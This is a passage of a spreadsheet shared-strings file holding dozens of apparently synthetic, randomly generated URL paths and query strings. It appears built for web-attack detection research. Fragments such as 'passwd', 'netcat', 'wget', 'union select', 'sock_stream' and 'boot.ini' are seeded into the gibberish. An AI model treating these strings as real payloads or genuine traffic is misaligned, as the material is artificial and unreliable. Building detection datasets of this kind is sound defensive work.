    <t>/njttgoe/1eptd4.shtml?xloccughgsp7teg=hup6n2&amp;shetc=hkbeeo9&amp;w@hn=02552&amp;mdtwoot=fo&amp;e1hxjjnxmetama=mep&amp;k5andrx6ftmpma=ks0mi&amp;bptmrl=ronnfi6avd3f&amp;stdewwd3ed=8858</t>
  </si>
  <si>
    <t>/-udw2c9wtelnet-/5eja/yz2be.rnyxjhkv2b/epcoxaeiegwsac.php?ra4ets=ws9rs+8&amp;hn1vfuiierp=osrovsihonn&amp;1io=ny1&amp;kaqhd=uhna'i+piutnd&amp;ntsaotnraqoe=ua7elykiteozs&amp;vm4p=rmid&amp;ey6dytn=pn8ahthorocie&amp;y64p=5&amp;osdo=nwjo&amp;eejbeinasl=98&amp;qooed=eaoab&amp;5eohs=2788&amp;3ee98hcwkmm=cdi8_t&amp;em7yelouar=84951010&amp;3sllr75llte34g=gl+ba</t>
  </si>
  <si>
    <t>/nceaamucqdoewgudein9/amreegciirha/psclailpm3pew/wn7uimwootjosfoa/xv4dumvvnjyk8xbp/e2aynerw/rcdn/eaas9sutlntla/ialzettarn2t6lu/cz90cjv/iosvenjuceghhete/bpeauh.swf</t>
  </si>
  <si>
    <t>/hgc-im/ipol0few7/ionleznfbbx-coq/cemj1teoog3bilnf57w/4octhwselanoreeruasi/tkxcmdrmhna79/42sknhjerz/eof_4rxcgxj/dwqw@wd4.bin?oeehcerejyj=+t1lpe&amp;r8mn=8549986&amp;ach=hsxaylyp-o&amp;sfe=oebx&amp;vbo3nah0beuxk=3&amp;huzt@7=sdsecmtbhocprreehb&amp;moetane=et+cunele&amp;iontefnvoep5=ilibou+e&amp;tllhhstt=cn]cw++fe&amp;httpnl1n@ecmd;d&amp;y6tomeasiheeetp=915298727&amp;faa5=99807027&amp;ruaanbjd7nt=nph-bnullieaoxitia7fd&amp;terf56eey1s4=2h&amp;eetny=sttfe&amp;dwuuh8=iazi8egn2w-d</t>
  </si>
  <si>
    <t>/5nsehxa/wo2cdkbquepdtzjnvjo/ih.sh?@j8ep=odp&amp;kode9ttn=retsr0rrueunhclam&amp;oue17etra0ng=qzwiliahfib&amp;ciframexlocationk-h.=idxu&amp;hecrb1aaoxrnd4=0&amp;ig-tkzxjbflib=o7no</t>
  </si>
  <si>
    <t>/_qaccepti.@/rxw./amjsij/ttisee91tver/clh0d7in/sam7o4hkvwv4pomn/2tierbhdgp6w.2_4/hernn5osaeefotx/yn6odmdidm/sform9gmwkhomebb/au6ixrta9s0eepijd/eoaeoeotli.asmx?s1ot4aicspta=s+dpee;rooejercp+8+select[2&amp;narocyhetjn=6o&amp;dzz7imgbqewinnttv=%ziiises+rklzp&amp;utge=131</t>
  </si>
  <si>
    <t>/sjm14x5vtita/hit-kp4p/7jpa/eotw/ub.cfm?lef=sh7rneioregcd3&amp;4i=rijaenlwbntdha&amp;sntaamrkbar=oia;&amp;msln2htdqh=0720375&amp;i3=8zieie&amp;eiwds=emot0&amp;bmacritidnchs=es9y&amp;h0kzkysied=43&amp;oimkaearila=2405944581&amp;acceptrgj@j5=78&amp;lbksb3ene=ahthatgtfs&amp;caojeuttracd=[sbabodyyhhttpseh-betweene&amp;afa5l=finthoe7tido</t>
  </si>
  <si>
    <t>/pruoebma/tpup/eil/hx9o7.ky1g0/een@c5alqlp/rg9l1ufky5oexgk8j.css?eqddahixt9nbuil=iadtp1inul&amp;hctlanrcfm7vers=uttmlorse&amp;vdttetcene=818282689&amp;irtnsll2i4e48ut=h.ejsjmc&amp;nqoem=+&amp;u0el=fatnskwsfnur&amp;it1lofa=alaiieplo&amp;uaidae=444961&amp;sitiot=2050298&amp;otonas1xciris5o=r1v_@b3npmrq</t>
  </si>
  <si>
    <t>/e5dfy/tdctrthonsypooi/1_0sxb/amulseegwhshnegriiic/om-03kixdsaxlcbpafwo/xsanpz4sbw8t.@2.asmx?3e=ra]ycat&amp;formhoe=61&amp;on=sere8enhet&amp;eh=2561761593&amp;oiw7cafrmdteja='&amp;utoe=68001022&amp;ynradusileb=hhicmd3lszn&amp;fasza=0l</t>
  </si>
  <si>
    <t>/adminb.rvjhwtjbve/svfwxh@jcvvm2zdd/jl.mo33c78enf1/asyr/ir5t/q_sqy@fw6npr5ix/yxuxtobkvuv.w4ul/t-we/re2cn9trtnn/a6rbf5mv.exe?pwlfol9hsshmr9=ncweuoner9dcovk2&amp;nc4ekti=ebg7&amp;ososxl6=qameai4noys+sid~</t>
  </si>
  <si>
    <t>/abiseojo8e3/bureai8rc3fr/ef15qi1zar/sgwn0nx86rkytgqhdnw/hyaudmjjgus/n1vor4ilslra/o5deyf4onazeacn/5xoq.nr5h0jkwl9hf/xj6pbao/nyvpsqbbhmdk.jpg?ld=916574&amp;qeoodooetwwots=a7zpaelji&amp;e6tka=6&amp;noounstyitie=69428&amp;aeu=5153409&amp;mnn=201&amp;ia=ooea+&amp;ggbfa_ls=1825&amp;dbbnph-q=ehdiogdmf37eootg</t>
  </si>
  <si>
    <t>/rja@/1ohtso6ytbse2tn1e.dll?masaa=81472&amp;8aleirwbvrn5u=okyjxmta.qf&amp;t5eepwlsao9=087530</t>
  </si>
  <si>
    <t>/rt.4/t@7lcoipikmfuts_qzte.cfm</t>
  </si>
  <si>
    <t>/hj74tuhu0ww/brd.7yuwqjq/wyedeevjczhiq0djwd.bin?ngrloyr=3&amp;i6=qe_09e&amp;vgoiueeogeas=n1ra9smeeesamoae&amp;tyssee=4access_loggeohtaccesem+ctwrqxp_oodropd&amp;sm2oe=bt~cadl9mhhet&amp;araniiwe=8?rea|&amp;sfg=beiy&amp;ilyifeme=hhoal19pun</t>
  </si>
  <si>
    <t>/cwq_id0b.w-7l.jpeg?rgntperhuwsoc=1258&amp;stohh6i4=34&amp;mnrahlxisin=0644</t>
  </si>
  <si>
    <t>/pdlak.5vqlt.e-/etmwlelt6ikn/ipv/t570kan-eme/otz4t/2-62si/kj5b/gsngmv1o4/aieboot.inih/hypnyiycggrb4zr2.php4?mhu4xsie0ohrzi=eym0&amp;.ofwmjjj=g9n$oiza&amp;osrdaqevoeaytwn=oasmochaotetcl&amp;xi&amp;yt0tsneneserct0=g&amp;noigafet=1450&amp;maiehspasaekujr=d$aahavingeti5ua</t>
  </si>
  <si>
    <t>/wdb/ppk1ved/piabpu/phpgblzwfghy/dky7v6d/iehw7oozectk9.png?escgh=0&amp;l49wh.krsq0a=emiona&amp;imfoasets=i3&amp;dr=49&amp;arm=331&amp;qahr=nteswtuh36&amp;connect6dogz5x9=3&amp;etdrrp6a=to8lglerro</t>
  </si>
  <si>
    <t>/naiee8i/e_/e10yhic.zad/t8y7n.r/doul/tatohhyaagdieth7a/a8mhahfst.pl?7oyuoj5hgfegh=+lndnph-xxeotein+fhstrh&amp;ps21mp=0871507&amp;rh6=aanyneacre1&amp;ruixms1h53fbhho=8007&amp;2asastcwwpz3ddh=e_sjapef&amp;ohhmsrae=66&amp;3imbdogh=x+j&amp;r1u6ty5onr=hwc_msidgv@r&amp;iecdasihenbaol=+lmw9e+heklyeiwhere;&amp;wget70qbtelnetjr8p=bva1b8z&amp;84tmr=depeto@</t>
  </si>
  <si>
    <t>/k4aadiqvsuwz1cc/-3catv/hrrslb3ho5znczn/iw2-8qiw.b@/3gbhlj230s2l8gaf2im/dhheupipfx7rlxhjav6/8eczi5i.css?gnzptq=3lonynaueautoexect3e&amp;gebpho=b&amp;5uutkxhttpspassthrui3body=o9dis+2lyrizunion&amp;fromva5l3wakpw=szqetrns0nt&amp;igeelen3=62983857&amp;etcgtgil7oiii=8794714&amp;_ywy3mlsok=61268585</t>
  </si>
  <si>
    <t>/nf.zklmyg/lw8q7bgsounda_/execu/niys55gv.asp?uuebbo9roei=m(eonl+:=toisru+p&amp;eaaqolienreeqea=41&amp;eweaa=618z&amp;b8@vknzf=rshy&amp;rvpatteateeod=rd)eddivhtutd&amp;lw3=o8wheneyhtggca&amp;xoq9imgl=08863&amp;6ernalic0sjs=sj&amp;stdinnvmhi9ue0=11&amp;irqslcaeydehya=saisu%xanoelit/dicn&amp;uoia=sbzsqums&amp;ng=50&amp;q31=9314947&amp;71ne=83928</t>
  </si>
  <si>
    <t>/cteo0o3sae/ofk-mznazn/sdqagj7_/eredsbrnemtnhitecn/uygs.cfm?a2es1e=+rmi@pri&amp;ifrd2eusynimt=vt'e&amp;uzssa4qywjw=ueerobsoeh&amp;ieii7p=umeej=yu%&amp;dtudleng=ttaaso+euh;3&amp;gemtek=jtca+&amp;5sosytedo=5131&amp;m8sfhs9a1=4&amp;smuust6=ezorvkjwcgz&amp;gw4hafb.s@-=59716&amp;goslhhon=optdeatnzoioo&amp;haen=i</t>
  </si>
  <si>
    <t>/a4/vxtfa%uvdockygservicespasswd/ejct2xwtisquf-lqtyi/kccnxcb0opze7@/r7fletsjner/onadvvwlmz4veacl.jpg</t>
  </si>
  <si>
    <t>/ee2dmmsnnhnhttsznap0.jpeg?euou3nn6=es.n&amp;aenei=axcfzjdpbxz&amp;nnalhsagt9w67==iti9h&amp;eenettcou4ekt=nlh.xnmq_@x&amp;ra_k=74486723&amp;zmetaq4mselectqwunion=98233138&amp;fdceenb=dltei&amp;usloeddrqigi8d=d&gt;[+uesbgsoundm5eoselectenano</t>
  </si>
  <si>
    <t>/zw3/netcatjfzbfs/o2o4ufbuzwag/ag_.1vdfn/aziedcs5wms-r5g@mq.jsp?etuadeahis8qeo=liboa&amp;oaeferst=nxsi5dw38x&amp;feeuukbntd0etf=sfkpred0aasoao</t>
  </si>
  <si>
    <t>/lhm8u95zkwas-ocx/oqpkm1md6dhhu/hme/emriledx8/dijj/anemkunadhdtap/uomaljhin9iuhd/t0nrlae3.gif?lr=u3xo&amp;idl=nheegleqrivi&amp;troirdcwox=smvmt0aste&amp;i16wtnht4c=jsock_streamt8&amp;109iareea=oh&amp;4cyix5=f5~dm3y$nbint:vakt&amp;8ass5wielt2=ne2stsltam&amp;5snywsrndz=3betweend&amp;heiicecun=799</t>
  </si>
  <si>
    <t>/7ulhtah6aaioetrxtiv/tj917@/enss/zp7bwensinypen4rau/dj8f@6/or/rgoahi/oeodaeh/oairrardryai6l3u.asmx</t>
  </si>
  <si>
    <t>/4dxjdl/leohanne27eteohspe/sus@2window.opend/etce/jttd1s7bae0rne/vugujw7l6ektc/wrtlunph-b/jlysxrmthd/eevyonahotstate/uwxshkehbgzzoevnxkt/sabeswdo.cfm</t>
  </si>
  <si>
    <t>/rwapmzdl_4ermvuojgr/ieo_qkfv9j0li1sbkt7/ayeodca3dlhsdqtoeqt/dagyromd/4o5dotgwekoigr/eda9euals/4senkttlrqoc7nh/tcwuova.tiff</t>
  </si>
  <si>
    <t>/olinjyq/sytlt/nsiwnfu0rpf/iihntas1egowf/eztqk6dp1eefi/dselectrs.gif?ewtnr=yarhe4fsertlis8&amp;hdernest=6&amp;owa6haty=flr_-auksd_&amp;alluhsxuru=niww7vhdednesed8&amp;ftoi7ng=484576&amp;eiseoe4c=od/stdin&amp;8mm6qnsyzpgnode=%a&amp;odsobn=919&amp;1hmao4wxd=92191&amp;kyrnoao5d9frt=ivlelbho+tr(7ocscripta&amp;kzi5urntyfhhg=98083&amp;ent=mtlho3&amp;httpsm1l.xczr=uvb36xhb&amp;scriptybcpflocationx=03062430</t>
  </si>
  <si>
    <t>/82.php3?eje0rnocthrkh=ad2rts+]9&amp;a12htpass=066398&amp;lautoexec94=scripteorto0ol++insert?lst]egmoo&amp;eo6l=il14k4b&amp;erdef=9oa7wl&amp;ehlwtluspo=ob</t>
  </si>
  <si>
    <t>/njecb/agun8smvih6wdotqxqs@/2zonulloaesoptb1soj.dll?sdy1h0sam6weri9=?riostmpetcformetcaos&amp;hsks=cr72ycwjir</t>
  </si>
  <si>
    <t>/da3/zcn4ewas3px@2xhrm..swf?np6bitlurxswme=s1e+n+n&amp;soinrowmmaha2ta=dnlnut1a7zslrh&amp;0caowa9=5778570&amp;yj6rl=eaaltfeae</t>
  </si>
  <si>
    <t>/askfo4yhxvnzt/mw/n3pdwecayyvmhbiy/r85abmska/nnullahfiar1ie53/o25eils9lh/0m@x/4bm.php</t>
  </si>
  <si>
    <t>/lw3/3w2ft/aipiy/ble4t5xlhposition-/ocetththsksdr4e9/ueimufzroc.php3?5l7=482904162&amp;crurey5=9&amp;yrkort2th8=i+&amp;iieeredlcuo=13856126&amp;sdv=~logins+yait</t>
  </si>
  <si>
    <t>/xgth/annv3dmpe6aoler/oq6uymcqojr/b7ptmd/fz1preplacebulikef/qmg-on0dt7l_t/noqwvrvzq6487/hnhswxotur/testlot9/ay6naag5peytmb/oy@ccoxgkvlt7bsfq.nsf</t>
  </si>
  <si>
    <t>/sces2hm/amh3vmbc/fff/ejdgorym3hsreb1.jpeg?t9=ehinuhit&amp;7ehp1isamymugv=rmseerfni8cct&amp;ceasatshbtsn=gnmfbxt5+%+g&amp;-3ffupdatej20gfpasswd=xddzr&amp;ssanoiteif=ha?d)dn&amp;cat-acceptrpgw=s8;ec|iuf&amp;ril=sao2eisiej|min&amp;ezxrcp0ll=6sqxxdmd-bp5&amp;tiidhda=anfk@dt3p&amp;issd0nzl8aun=51615&amp;09enmhwuooa3=nrn7ogzfnatn&amp;eerer=eroefshmnoep0te9</t>
  </si>
  <si>
    <t>/yafgsddttthiqi/ttrl.exe</t>
  </si>
  <si>
    <t>/isss8chaoimeo/ibsec5doeqgtsd2j/eemll4s/3connectwybgsoundrwget/rrmvalz71byrd/oqzhhhw6l./vt/smed/e.ksrf6mf8f3@gcx.8q.sh?trbatieinz=xstdnnatiahon3%&amp;jlhe=ltbodyfo8&amp;ewylhhksair=nzduvc&amp;ton4lg6zix=eta&amp;o5t=3eseebhxeisoa&amp;ca=+ere-re%i&amp;dsi=qgxiiiatmnete0&amp;mmnedriyslte=et-eyhpcrxqp&amp;a6n2e6trrhefht=5115&amp;6zlqjqn3eqg=nph-9&amp;sw=vftrecrittdravab</t>
  </si>
  <si>
    <t>/fxglfpc/vwu0tdmpenrs1enciaee/s9/t@fldcqphicihyzq/tjq6ikjas3.b6/aaissofesoh7ot/tao-17h9r0nrixmxuw.css?ons4oerao=ilh&amp;dnrshs=erasehe&amp;_nat7=ez&amp;t5msrin2nyomdii=4600283&amp;nnstiehrroie8w=me+1cort+wp-xwo&amp;o0onnspus8ndr8=wyns'&amp;wrnweantho=(bawaj6ioou&amp;cdehjftarho=%kwydi$c&amp;vscriptdb3u=rnhhnhwzhier&amp;xqdeaniamscenda=397490&amp;ini4ydr6n=ubb7&amp;e7oetes=6853656398</t>
  </si>
  <si>
    <t>/wsrhoecit/izcnhzkyfpgsyd1/d0eedoelsnnioen/pbi3dayttsrtrlt/sphmtndeaj3ai/cit0lnhohg9obyneib/ps8ah4hrnvdazexwli/@qp7dthx1s.jpg?fya1puzvetlra5v=32600&amp;5t7dfzadcocmsxe=oamxp&amp;dnhik=is_6&amp;8irook=ost5htootoymainat&amp;ziqq=2430851830&amp;ie8xifrrebinrr=$b&amp;ttciesed8h4r=tkmasb@-&amp;4bltnteb0oi7=h&amp;teb=24971845&amp;s8twooteisnsin=miidydmbux3i</t>
  </si>
  <si>
    <t>/nf.jpeg?tmstahavwse=g1aadigk+uknull:&amp;7sre=1471527300&amp;uixerjmhtehc=z1segy&amp;pphpbh.=yld&amp;fnf3union2acjqa=ialeadol&amp;ttmpyf1position=tne&amp;fr2owi9t=jout0xotzn&amp;meiilln=9702&amp;be1hnwii5=j&amp;szr=$&amp;pkinrcihn0rtomt=q+)194&amp;sann=usaccept1&amp;h3gn=th7vs8&amp;anahokncs=0676981&amp;cethho9=position++</t>
  </si>
  <si>
    <t>/t2.f4yxd.@wnk5uy6/nopsaw8lq5/nut1ahbaudgie/5siyft4aorw/rebdd.f/retfz/dfcztm6mm/ooeeje/bvpwlq90o4zncoosl/ciphs/44sxlk.1zexecereplaceh1.nsf?rxhttloaaodso3=link(</t>
  </si>
  <si>
    <t>/fpasswd1lkxurojbodyctk.jpg</t>
  </si>
  <si>
    <t>/kaotsiyw3i9sosne/ed5h0w76d/nc./tet3rnenleeoqdeeeb/.9xg6vtmpwindow.open6in0dbdre/qs/rug1c8dixmoa.nwqv.y/uf2dbz-i/td0lseaardt/flbuk-a7mrpvxq/ixcjph/he.shtml?ratntt=23297&amp;3ph3umer=mufk2e&amp;eelelp=8&amp;telskgrzg3drop@=t3j3utwbcjc1&amp;3h5s8vwmgeri=https&amp;8xt@_.like3yishutdown=tetrid&amp;fvglxk=q&amp;d7yeehaa0hh=7toeelb3eemlil&amp;oettttsffsee=12&amp;cgig=null$</t>
  </si>
  <si>
    <t>/faslrjeytf/le0/cvieq/emhprpalia0nicdehoe/tataday0leit5nio/2qt9od@zzi/sicoihtlsizl/63alcatj_siopasswd.script.css</t>
  </si>
  <si>
    <t>/cyuzbswjbz6ab/agyn_.htm?nseo=sejs+e5&amp;opooysoci=+iisesystemia&amp;zaaohj=qmvbvg&amp;bdraorh=7cih&amp;is6nu54nems=26&amp;i6vada=nmiya&amp;chdspasswdvokfselect=slte</t>
  </si>
  <si>
    <t>/0eyy3n/att2emzqd/ldnllon1.asmx?hdpmma=h8jqcz9f&amp;tiat=19&amp;ermwaaien3=yxtermoe+eteieb6topr5&amp;f4ghdln7rrienei=taa5os=e4mf&amp;keoyu1out=sdmroutol4c&amp;thorhd=rusoan7ktaesis</t>
  </si>
  <si>
    <t>/sn/eva/oia@@mm3l2xadwcdb/logeoomi.z/dio5rahrnopect/z_mth2l/iqh/n0grwf/tcezjkdz_.q8/j5nty/r9ulh.mdb</t>
  </si>
  <si>
    <t>/ha/4q/v2fbd.aspx?tteuniuesdx=h@xjg_znx3c&amp;slopcibrreoane=b+r7dmw@s=&amp;heeabrrysp=ttce8it&amp;htpass@kh8=40axp_&amp;aa=pdjek0hum5f&amp;ates=3m</t>
  </si>
  <si>
    <t>/vwxcogn/zz26fips68ug/ho-ztgevaogmiem./qilt/bylywaaimbx2/hariupeebitsuiultt3/rvw/pm9ftvehsetogq/fikpsexeccr8w/i1-vzadminfevallhnyn.jpg?nw3ajbwdaroauc6=m9j&amp;u23w0kqqoji=rbrmkwon&amp;xoueemuaena5eq=s0t3nu&amp;soa9nhdrl2anoea=490747585&amp;e0clv0es2vmta=lbgkoei&amp;_c-xh.co=0eihmnaeee3&amp;oaaoss=sm&lt;ne&amp;tmtnntssislush=sa@r7b9z&amp;ksne5iemtea=r;dg&amp;esopeng_tmpww=9994</t>
  </si>
  <si>
    <t>/m_cg.sh?1q0iw.w6=r.wmzsnrh0&amp;zcxc=54&amp;kigwxinsert=660&amp;hmketsrqw8lh5kv=6747&amp;tnmbanoot=ltmlocationebi;7tusrtto&amp;eawatsuf8htena=404664&amp;nntahkr9=ixjt&amp;bgsoundnopenhbng.5=bodysst~wp8ceerroeal&amp;nniionn2=mwose5iebe&amp;@-dservicesfuexecsfr.mail=291738019&amp;nduhtr2=openencr&amp;1vftpvgabq=n9ww</t>
  </si>
  <si>
    <t>/owaeai9trrdeotl/x7dtteee2steotl/eee/jiii5mrthaafhes/mnhe6sy/ipopde16/scriptf6.1amochaidivv7qg/1c7kqyolzry_qipi3as/echou3f/otomtshwgceewohd/aqbwfh9rslp-82l/hbngaoaevyhe3ih.js?8lqp67eq=ro8sttbizzati&amp;eelsu=2332164&amp;2bsug8itnaer=45313&amp;b8je9null=+ecd&amp;m5dlcn=hdiorsantlogbga&amp;ienm=z&amp;oei2edae&amp;uredh69dpdmra3=aaczl3zwneeb&amp;eimskhde=etn&amp;lhei=am0ashiutddync6n&amp;drltsfeofrnei=41&amp;l4.passthrulhoh=36503&amp;stki=rh</t>
  </si>
  <si>
    <t>/ezopsi-lzwqgy/@gmudnea-m/mnwcedon2qioem/one0diyewjrtmt/hzqzejfrag00g9by68l/hx2x@x8c4/7xtexrtdye1ntsnbtcs/facwy.pl?kawk0v0bb-=aebet1kht1fanur&amp;ni=tn@u</t>
  </si>
  <si>
    <t>/oic/ds/3r0gn/x2php4pof41z/eoc1lmguxiwizsb/uwaipzoqwt/a3t/eas/d6kwgetoz1rcri/ovd2u-g/iym0yuu.html</t>
  </si>
  <si>
    <t>/otxutrtrteaatiorooj1/rrbu6tn07tje/aac6kkb9j@2ex/ime/n2hzf.2vvfygozm2ff/eshutdownurms5cat/aepeo1inoredodr/ylq4msic0eoat/9a_/mzbe.p/cwaamisnn8ns/kfudx9lxcmp_qud.png?oarhtnni0n48j=575587&amp;ls8_@nxdru=0894834&amp;llyqgeelhcato=lbn&amp;1stnetgzlr61i=e+@?is&amp;yeufei=+tiwss5imaileqy&amp;rntnm=ieusr3&amp;aiietcera=t&amp;alojgne2mijlsi=xn_h@6fkeo&amp;oact=eha&amp;fwirew4t=dofernobssjoemr&amp;nl=65&amp;oosedh2o1a=0484&amp;9oium8nozjh=seiy7d$sock_streamhsdpdd|is5+6</t>
  </si>
  <si>
    <t>/tkveez.je7m.cgi?reontnborlra=94347&amp;dtfarddo=3023436&amp;nmls=$+c0&lt;e2ef4&amp;cqnnodrzrsmesto=+a|boot.inimscript'b&amp;i8onetcatib=sw&amp;icehmteeeudorth=0wewonc0aifeij&amp;ntsh9i0auoh4=33&amp;r8va=a3ltiesedoh&amp;st=bon&amp;manlpreainr=cqhi9lczt7w&amp;qtiestentp=348111&amp;3butacuhftg3ynd=5622</t>
  </si>
  <si>
    <t>/anjiahnyjdiv21us/jzw7insert-k2/freldeic/x_7baf6u5_mm/eltqpr6peebsst1x6tes/3koaioydeul1k/agnyletdiroue/x3v/etonulll0jhkgoch/49jl/vdfmasjhp@3k/osayce.jpeg</t>
  </si>
  <si>
    <t>/f3smwtwtmoar.nsf?hnota=88524214&amp;nyteowa4u=ptiee4ftxwtaef1e&amp;kvcrrkincludem-=;h6homett</t>
  </si>
  <si>
    <t>/recnw7ddpecer/m_ol0mtlnetcatk4r9o/crrpzweyk/h2-vrdrzrrrpz/ac.ki7snjxvndhx/nei/dtgnpmnkwhsmczthb/osti1enrhcrstersrido/d2vw8udtmlzzl/zoyniqrm9y/s2d6vld@vgl8/tudiug-p.php3?sbllidhyp2m=izrenugyiq3izaoya&amp;en3sror=dbin7&lt;wph3i\\dr&lt;/dandoptp&amp;ttvvpiecreensp=4ewut5eied</t>
  </si>
  <si>
    <t>/m4vu9kobjectbna/lttfdlogoacceptincludeq5d/tejni/etcinserts0az0dqdivjdy/isnt0giannherepn6/e7o-ge.1fereq.rg/nphpvhlk2yyi6/6iiim/pw6pjqgohy.jpg</t>
  </si>
  <si>
    <t>/facitohk83w3htn/dxt3djaodh4dgga5un/f8l3odz6sq-o/duolmifd5so/krbaco/dyd6idpopentn76.gif</t>
  </si>
  <si>
    <t>/iu8erlgjobtsodcya/b1/af6afv/ee5eb9un/rqpdeletewph6_w3gg/ibykefl0z3qdq0zpe_/loe3v3hulbngoqttser/xg8nnwexec.kjajmocha/ekn/hbcdaajsd3ov/epe/lq87lyg3x4amx.js?vqqx6@h=iauroodtmooedeur&amp;isn9=fzrreaeonaiaumiso&amp;sodn9vjzelee=sqtjw&amp;ta=92&amp;4tjmbody5xmlowtzm=t@d&amp;wxx@qnx.-oc7=m4k9t?tnagroup+byo9i9n&amp;7n=zta3u++i8&amp;jpcxr0=9607&amp;ta6u5o3ies0um=wuoaton0xmlrha&amp;icuwbtr=tp;rs&amp;tl=28549619</t>
  </si>
  <si>
    <t>/fbctdvi-pe/peu0js8cbs5dxa/ierv9pealge2rsdeewrl.php3</t>
  </si>
  <si>
    <t>/sceuwm1hq/0uwnt/ptlsl28wlaqb/ptyrstkrrhe/rmtolaerinp/eoueob9netee/edteajyi5/i9tii2wttpxer1eeuu.asp</t>
  </si>
  <si>
    <t>/qtvbvekxcmd/mlz9nph-f6e9k0/qzkvd6xs-0xkdt4ap1u/es-mmbl/zb/j2tedddtmpkcmd/0xdh8j5ey8opw7we4sms/pci3eatirh2vrnlos/m58rb79yh1izimgr/jecho81b5eo/d5m@3fgt_lm.php3?uoy6tt7soao2d=17448328&amp;a2oeohtiieb8it=pdbyn&amp;tvaes9rrs7=u8si+fr0dxriy&amp;fnehysrel=ovcq&amp;execlikegvt.cx8.n=hfszlnl&amp;ichutsosd=83&amp;li1nt5dphe=~ph&amp;hn6ti=syeyhee/&amp;aetnn18tsor=r9znoaosm&amp;om=12174509&amp;ai=realheocugeev&amp;os8rnoe=0jgvta_e203y&amp;frlcee=9463&amp;ctalaoom7re=heaomwdt</t>
  </si>
  <si>
    <t>/ena3rina/otahhi/yih1pegecertimtnn3h/r4eeoe4mabefhsth3r/dkjdb1/bfeife3l5.cfm?eoehstwbwooi=ibniacunifeae&amp;ie9=cp4rz</t>
  </si>
  <si>
    <t>/ea-yrjnn6sclj_x/h8v/lpycvxhchildzh2xtec/lic/hc-childmeta.dll</t>
  </si>
  <si>
    <t>/175n65linkwkz.xga/q5as.pl?ltu1srsfleecso=+deptelnetf+catiuqp&amp;haeocso2htetn=wao&amp;av8etemaleltnho==+ifs&amp;wzdaue=ees&amp;hn4jt=250232&amp;qkio=d2ichwt1sjn5&amp;jueeel=auhzhb&amp;rvsieo=%h+@t]ob/tadg&amp;nqetclx=nrz</t>
  </si>
  <si>
    <t>/c2jnlxcy/xp_evtxterm/0b/ee@hhh6utos8ug/hmwqw177ufde/joafsiqesnnhd/4nrin5cihnr5/5nnke0nzv39yqqi6/nhzeww8creujanolbcoo/edncjdclocationformchildphpqui/7vngtett/4lkatqg8iom.pl</t>
  </si>
  <si>
    <t>/4terme2aoo3mnofeli/n@k/n-u6u2aaanwjerfnxud0/wsir.xybgk./8weolee/j4dsimgk/.0flike_j/o8evlrdriem3lstr4d/tv7/jt7hajl/amzt/nrb.png?pe1ydnjcjhmw=leonauefd0ylrti4t&amp;dfe6shtrecui7=s+un&amp;tiro=ralogr&amp;me81=7nm=k&amp;d2imaill=1552965735&amp;a0o7=c5x8&amp;roisre=75065176&amp;l4ye134c=rru6aoqueee&amp;lmwgfn9setrgl6=s+oon&amp;irgeztsare=eoxbodunl&amp;htpassaxs=aifc=slnhtpasssmocha&amp;ehay=3620981</t>
  </si>
  <si>
    <t>/qyeu1wpetc3/e5.exe?p2v8te=5o&amp;oanductstecor=lstuog&amp;nycmcdw=&lt;5s&amp;vkd8=saymqiuorrsbnln&amp;trya=f+|ed4a&amp;zutysfeit=malipitc9ppeaurln&amp;ouot3eacooutjhr=5q..n&amp;aausescupnk=rtncoe63eb&amp;vntyhjssuqikdmi=30&amp;leulcscelq=0&amp;a4ugreqeed=location4eusrl(trapryd+&amp;0itpteoh=abwiich7&amp;oenwjsalsa=taeenehusa8qd&amp;ephcaccept3delete=euusdarloilnan0tesy2</t>
  </si>
  <si>
    <t>/2evalbc/o-km.gif?neaetcenoza6to=ei$tr&amp;oasc=683158&amp;9oeaa7ufwdaa4at=37127&amp;knooirg='/uasock_stream&amp;buscce=h&amp;tdeslieeegyap7i=388044&amp;ipo1ju=ar5budymaqrh&amp;iiito1ns6h9=rmbbb&amp;qcman=0148&amp;vfeulg=f7metan&amp;yqhua0ud0ncan=tue/5qjnkgeecm&amp;i4kl=30&amp;2ddts=hn&amp;sl8nnseaiei=a2ewuoatf</t>
  </si>
  <si>
    <t>/bh@rdna7hba90/ofrmkfm92/tm/nu7eo2so3lddu/a.perlr2@v.css</t>
  </si>
  <si>
    <t>/s66k@/uu1@tyawbcnhshe/badminq1d3_ibqs/fs1ezmm7kdkrop-/nbbnlehinigec/tzan-2o-co4cr7w62f/.2yq.php?sphnaesismzppt0=519&amp;ned=paaiyteoa0&amp;xb=lees&amp;ce80uehdcqi=kxoytnkvo&amp;eepytkkgtesttn=tmzo+~a+scriptstyle9qttda9e&amp;etbrfura7uh=2616&amp;oettxtuu93chl=erds+e</t>
  </si>
  <si>
    <t>/f.v2sooccizpr4poxbf/se2wgrgnadvmsnnehs.aspx?lsq0t7t2iy=et&amp;sut0vososaaen=y4k1+&lt;oomsy&amp;aa=aee]&amp;h1vew5gnt=91682733&amp;5porspnemoa=1&amp;o1lgsetzmc=2&amp;openaeinyallqu90=igweaazwh7vq&amp;u7hk-vbd=2yllll7di&amp;mtntthtp2ypatet=+eusr=a&amp;ylbeo7=55813&amp;annsieuh=216&amp;mdoj=80578&amp;gnrhvvj=aaeosere5mtpln</t>
  </si>
  <si>
    <t>/5p/r2/oj1@c1@/renk8xm4/oihqf/siieay/u-3gujyxjp4ak_kwxfi.dll?doawea4ejfnntse=6087</t>
  </si>
  <si>
    <t>/imvuyfrzlu/ew6usraihqnmzehssh/gas6hnicoab/ncpusam/0inputkqq.vsock_stream/np6ebpagopfhah3hta/hfjwy1x_hen6nitvuz/8g3p9/njlaamw870pyg_aeqz/ed-psdvx8vrgbiw7g/gh86lrsa-4cw/hf.css?hy3sahiwoqukei=&amp;ytobh&amp;eel=o?</t>
  </si>
  <si>
    <t>/e7/eaoimhebzdtdij9s/xtquhkjz/bnfmymttbnrd/nire62tcueajiwem26o/e_xo/oeamero3le/9laqsnst1esr9mu1asc/z8sceqdom/tuxtow84fl2m/1tni2twbjh/dufdoeha5nchrura.asp?cci5fti4n==oxtermp0;&amp;cy=ah1i&amp;enui+aa(bine4&amp;oap8e=21&amp;pwcgaxiub=tomfjk5dsaytg1h&amp;x1-vvfrinputhn0x=as2zsaue7n5services\\&amp;tgupztcyaaqadr=04336&amp;iqaant9evorlch=hlttptosbsn&amp;as9ejiud=3354915&amp;rcha=ta/er&amp;dwt/mps:nbdocument~9d&amp;nvar=h</t>
  </si>
  <si>
